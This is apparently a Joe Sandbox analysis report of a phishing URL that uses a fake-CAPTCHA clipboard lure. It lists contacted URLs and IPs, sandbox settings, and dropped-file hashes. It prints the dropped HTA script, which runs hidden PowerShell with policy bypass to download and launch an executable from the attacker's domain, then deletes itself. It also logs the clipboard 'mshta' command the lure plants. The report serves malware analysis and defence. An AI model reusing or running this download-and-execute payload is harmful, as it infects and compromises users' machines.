                                                                                          https://rea.grupolalegion.ec/p.php...mshta.exe, 00000008.00000003.1757390190.000000000306F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1762396893.0000000003070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://crl.micropowershell.exe, 0000000A.00000002.1871375752.0000000002AC8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1891559944.0000000007150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://rea.grupolalegion.ec/p.phphttps://rea.grupolalegion.ec/p.phpmshta.exe, 00000008.00000003.1759760781.00000000081B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://aka.ms/pscore6lBpowershell.exe, 0000000A.00000002.1872617715.0000000004A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://rea.grupolalegion.ec/p.phpt1Smshta.exe, 00000008.00000002.1761644905.0000000002FB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://rea.grupolalegion.ec/mshta.exe, 00000008.00000003.1757390190.0000000003041000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1762227045.0000000003041000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                      		unknown
                                                                                                      https://rea.grupolalegion.ec/rmshta.exe, 00000008.00000003.1757390190.0000000003041000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1762227045.0000000003041000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://contoso.com/powershell.exe, 0000000A.00000002.1889596762.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.1889596762.0000000005A5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.cloudflare.com/en-us/website-terms/chromecache_74.2.drfalse
                                                                                                              		high
                                                                                                              https://rea.grupolalegion.ec/p.phpWmshta.exe, 00000008.00000002.1761955552.0000000002FE1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1758244339.0000000002FE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://rea.grupolalegion.ec/p.phpUmshta.exe, 00000008.00000002.1768844911.0000000008A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.1872617715.0000000004A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://rea.grupolalegion.ec/p.php$1RQmshta.exe, 00000008.00000003.1761060931.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761873050.0000000002FCE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://rea.grupolalegion.ec/p.phpWinSta0mshta.exe, 00000008.00000002.1761644905.0000000002FB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761294842.0000000002ED0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://rea.grupolalegion.ec/p.phpMBEmshta.exe, 00000008.00000002.1762646068.0000000003340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://rea.grupolalegion.ec/p.phpsoftmshta.exe, 00000008.00000003.1758244339.000000000300E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1761955552.000000000300E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://rea.grupolalegioHpowershell.exe, 0000000A.00000002.1872617715.00000000051D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		unknown

                                                                                                                              World Map of Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public IPs

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              190.92.154.206
                                                                                                                              		rea.grupolalegion.ecArgentina
                                                                                                                              		10986DesarrollosDigitalesdePulsarConsultingARfalse
                                                                                                                              239.255.255.250
                                                                                                                              		unknownReserved
                                                                                                                              		unknownunknownfalse
                                                                                                                              142.250.185.164
                                                                                                                              		www.google.comUnited States
                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                              216.58.206.68
                                                                                                                              		unknownUnited States
                                                                                                                              		15169GOOGLEUSfalse

                                                                                                                              Private

                                                                                                                              IP
                                                                                                                              192.168.2.8

                                                                                                                              General Information

                                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                                              Analysis ID:1631656
                                                                                                                              Start date and time:2025-03-07 13:20:23 +01:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 4m 29s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:browseurl.jbs
                                                                                                                              Sample URL:https://rea.grupolalegion.ec/p.php/1
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                              Number of analysed new started processes analysed:16
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.phis.troj.evad.win@27/16@11/5
                                                                                                                              EGA Information:Failed
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 80%
                                                                                                                              • Number of executed functions: 10
                                                                                                                              • Number of non-executed functions: 205

                                                                                                                              Warnings

                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 216.58.212.131, 64.233.184.84, 142.250.185.174, 216.58.206.78, 142.250.185.206, 142.250.184.238, 199.232.210.172, 184.30.131.245, 172.217.16.206, 142.250.185.110, 142.250.74.206, 142.250.186.35, 142.250.185.238, 199.232.214.172, 23.60.203.209, 52.149.20.212, 13.107.246.60
                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                              • VT rate limit hit for: https://rea.grupolalegion.ec/p.php/1

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              TimeTypeDescription
                                                                                                                              07:21:53API Interceptor1x Sleep call for process: mshta.exe modified
                                                                                                                              07:21:54API Interceptor43x Sleep call for process: powershell.exe modified
                                                                                                                              13:21:48ClipboardRun: mshta https://rea.grupolalegion.ec/p.php

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              No context

                                                                                                                              Domains

                                                                                                                              No context

                                                                                                                              ASNs

                                                                                                                              No context

                                                                                                                              JA3 Fingerprints

                                                                                                                              No context

                                                                                                                              Dropped Files

                                                                                                                              No context

                                                                                                                              Created / dropped Files

                                                                                                                              C:\ProgramData\Captcha.exe

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2142592
                                                                                                                              Entropy (8bit):6.657298705059237
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24576:KVdGH7WBRxQvLkkYLg0ZXntxSFdIqLoG22f7mfI5nBEyMJmyW+UZuWkLpR5SgFm7:KCxt6PAkC/1Zgvm48zpQk6zC
                                                                                                                              MD5:05B7F29D1BAEAC0A7513D094BFC12A92
                                                                                                                              SHA1:47B0C9C07259F686C956F663FED28F3814484D0A
                                                                                                                              SHA-256:B311D9ACDE2A85424964D775779F3D9BA9FD4DB64A5595EC7AB64305F77C6A28
                                                                                                                              SHA-512:1DABCDA5F7F8E32AE0E7FB2F88B61D0DB8BDBA749C89F6707426F4AB4942E398E8D5155D5CE251A26977E0C747F177ED3EE4AD7DD37AE0F776776F0630C5CE5A
                                                                                                                              Malicious:true
                                                                                                                              Antivirus:
                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                              • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                              Reputation:low
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........D...............(................... ....@...........................#......q!...@................................... .L..... .FA............ ..).... ......................................................!...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data... .... ......................@....idata..L..... .....................@....reloc........ .....................@..B.symtab....... ......D.................B.rsrc...FA.... ..B...F..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\p[1].htm

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                              File Type:HTML document, ASCII text, with very long lines (693), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):693
                                                                                                                              Entropy (8bit):5.522043567403651
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:haxJWWdoF2Hctgf2B8qJps8AV+FGkOKodE6Iy1M456VmpfBaLWal0VxOJlMM+RHO:ha/4AHctQ2B87+8TKoDgZV8BJa6VxOrb
                                                                                                                              MD5:D1719DA179322B4243857F67C72CDAFD
                                                                                                                              SHA1:BEAEAEAEC2BF1E0BED7FF921FAFB574D8DD9E32B
                                                                                                                              SHA-256:6FEC9C5B0AF0BA477D75C7BC35571E3BC757B61B53260793425C7EA63228D084
                                                                                                                              SHA-512:1B2B312D802B6D3601F62345CF931DB65429F17588F85BC2AB989B84A35E6DBA6DDDC5CF3AA200CD160AE1AE2D5DF89FAC2AF021A690B492A47E9BD20472A309
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:<!DOCTYPE html><html><head><HTA:APPLICATION ID="CS" APPLICATIONNAME="Captcha" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no"><script>new ActiveXObject("Wscript.Shell").Run("powershell -ep Bypass -nop -c \"Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\\ProgramData\\Captcha.exe; Start-Process 'C:\\ProgramData\\Captcha.exe'\"",0);var filename = window.location.href;filename = decodeURI(filename);filename = filename.replace("file:///", "");var fso = new ActiveXObject("Scripting.FileSystemObject");if(fso.FileExists(filename)){try{fso.DeleteFile(filename,true)}catch(e){}}window.close()</script></head><body></body></html>

                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1300
                                                                                                                              Entropy (8bit):5.399611626866461
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:3JytZWSKco4KmBs4RPT6BmFoUebIlmjKcmZ9t7J0gt/NK3R8QHr6+:5yjWSU4y4RQmFoUeUmfmZ9tK8NWR8QHb
                                                                                                                              MD5:FAD6E2EC9167F1EE2392CF4C5B6291B1
                                                                                                                              SHA1:12215DE530CECFB82B75925824E2890E8A1CD559
                                                                                                                              SHA-256:9C895259DD17D591C4532F01623D729978B09CBBEC228D66E5792078ED7A96C0
                                                                                                                              SHA-512:DEEBB7B7E52922DE6EF7320434F2342F5A9854B60E62B2B08A74EF40751180A3AE7E9C516A9943D3B7929BF36C080C22DFEF9E02ADD7B0C3317064BFD1475E56
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dojchh1d.43z.psm1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj2rl2sh.mjz.ps1

                                                                                                                              Download File
                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                              Download File
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 7 11:21:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2677
                                                                                                                              Entropy (8bit):3.9785386414673067
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8t0dvTH/UHocidAKZdA1oehwiZUklqehLy+3:8tYbX8y
                                                                                                                              MD5:82E5F8DB18049AB3BEBB1EA528FA0057
                                                                                                                              SHA1:9AFCFD5D35F2B35BB38827CF45A629BEA62BC56F
                                                                                                                              SHA-256:3F069E892DD2E8102BDCBAC88D316FDC1C2896874DCA028B299A2F62FD409BE4
                                                                                                                              SHA-512:97A3CC12F4F68595022CA770DEEAF6B1D5FA5E1D44322D018E47E9D7F603B5C11B3AC3B20F7C37A1C6547B04D3C27020AFAD03739C0E8DBA551A2E392BF48FC2
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:L..................F.@.. ...$+.,.......u[...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.IgZ.b....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgZ.b....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgZ.b....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgZ.b..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgZ.b...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                              Download File
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 7 11:21:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2679
                                                                                                                              Entropy (8bit):3.9945793929152513
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8r0dvTH/UHocidAKZdA1leh/iZUkAQkqehsy+2:8rYbd9Qly
                                                                                                                              MD5:B7FBA356D5E717AF9380E04942E32646
                                                                                                                              SHA1:EAC88BE533E7DC7BBB733637A8FB72221C1D7F96
                                                                                                                              SHA-256:2C5E19835B445F7F19140763CEA7905695E469EDEF196B068C843E5644310F9A
                                                                                                                              SHA-512:BF5EED30090F4C1E352C7868BB6B3F2BD5675434D7B4E8CF9C5B1AB4A1C7E965C8F3DAFAC8C107B9CD531B6992A9E95078A27B4FBEC43CF82DC5196ECB4B7F89
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:L..................F.@.. ...$+.,.......u[...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.IgZ.b....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgZ.b....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgZ.b....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgZ.b..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgZ.b...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                              Download File
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:00:51 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2693
                                                                                                                              Entropy (8bit):4.004459347159963
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8G0dvTH/bHocidAKZdA14t5eh7sFiZUkmgqeh7s+y+BX:8GYbInwy
                                                                                                                              MD5:6306A8A1549805CF117538247B966100
                                                                                                                              SHA1:8343F5F933C88990592F90A78C3A3E1D778824D7
                                                                                                                              SHA-256:25B6061A94A802F2616767C107E1AE12E4E845E4193D4A8FADC08BA07E4EDB63
                                                                                                                              SHA-512:CB668980BFE5499D6362A4AC52DCC89AC02A92F40FC97D4AE389AD1DA0C973EAB4D17BAD0976133DD014615F036F8676202A41F1BAFDCD88166ECB1FE4A8CBA2
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:L..................F.@.. ...$+.,.....C..b...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.IgZ.b....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgZ.b....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgZ.b....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgZ.b..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VEW.@...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                              Download File
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 7 11:21:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2681
                                                                                                                              Entropy (8bit):3.990049851283437
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8aE0dvTH/UHocidAKZdA16ehDiZUkwqeh4y+R:8aEYbuGy
                                                                                                                              MD5:EB2BC5EFBAE553D7860D526112CB064A
                                                                                                                              SHA1:398C1CF077948194F11E29F4BA66D6E0AA84126E
                                                                                                                              SHA-256:20EEE047AA63E5298F1EE26F98A771F78AD62C627DA131B6394201735143055C
                                                                                                                              SHA-512:D55FD0577DEC038E71ADE9EA0B6AD1FF44AEC5E5C1F42BA5260D5A6E6B876FA4C9DDCBD8A66595E4468F35CFA44BFA79AB0CC19835DB6FA5FB490BA1A1AAB70A
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:L..................F.@.. ...$+.,.......u[...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.IgZ.b....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgZ.b....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgZ.b....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgZ.b..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgZ.b...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                              Download File
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 7 11:21:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2681
                                                                                                                              Entropy (8bit):3.9829964551944985
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8U0dvTH/UHocidAKZdA1UehBiZUk1W1qehyy+C:8UYbe9Sy
                                                                                                                              MD5:2454419B3853BAE56206025F9489403F
                                                                                                                              SHA1:7AA036B85D5E2908F7A3FD1BBE27340CD23772E6
                                                                                                                              SHA-256:BAF3CC7C58180F8A2F8DD1AE1B716E93D589FFBEC3BB66A02587244844C27578
                                                                                                                              SHA-512:4105060B9A2862CE0154E21D879C66AF2E17F0D9D580EB7FD6A56776E4CF447FD157DDA7CA4E39443EAE95C3E72D5AF83EE26A4C68E9EE7D6FBD11F15E66C5A8
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:L..................F.@.. ...$+.,.......u[...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW)C..PROGRA~1..t......O.IgZ.b....B...............J.....V...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VgZ.b....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VgZ.b....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VgZ.b..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VgZ.b...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                              Download File
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Mar 7 11:21:30 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2683
                                                                                                                              Entropy (8bit):3.9948227916265413
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:8S0dvTH/UHocidAKZdA1duTrehOuTbbiZUk5OjqehOuTbwy+yT+:8SYbfTYTbxWOvTbwy7T
                                                                                                                              MD5:E7D58336447355800E270744345EBB2E
